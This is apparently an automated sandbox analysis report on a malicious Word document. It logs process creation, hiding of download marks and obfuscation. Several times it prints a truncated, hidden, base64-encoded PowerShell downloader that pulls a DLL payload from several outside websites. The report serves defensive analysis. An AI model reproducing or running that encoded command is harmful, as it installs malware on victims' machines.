DgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008085 push ecx; ret 7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004ADA push ecx; ret 7_2_10004AED

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Iiasa\gdao.xuk:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Pqftsc\netes.ucb:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
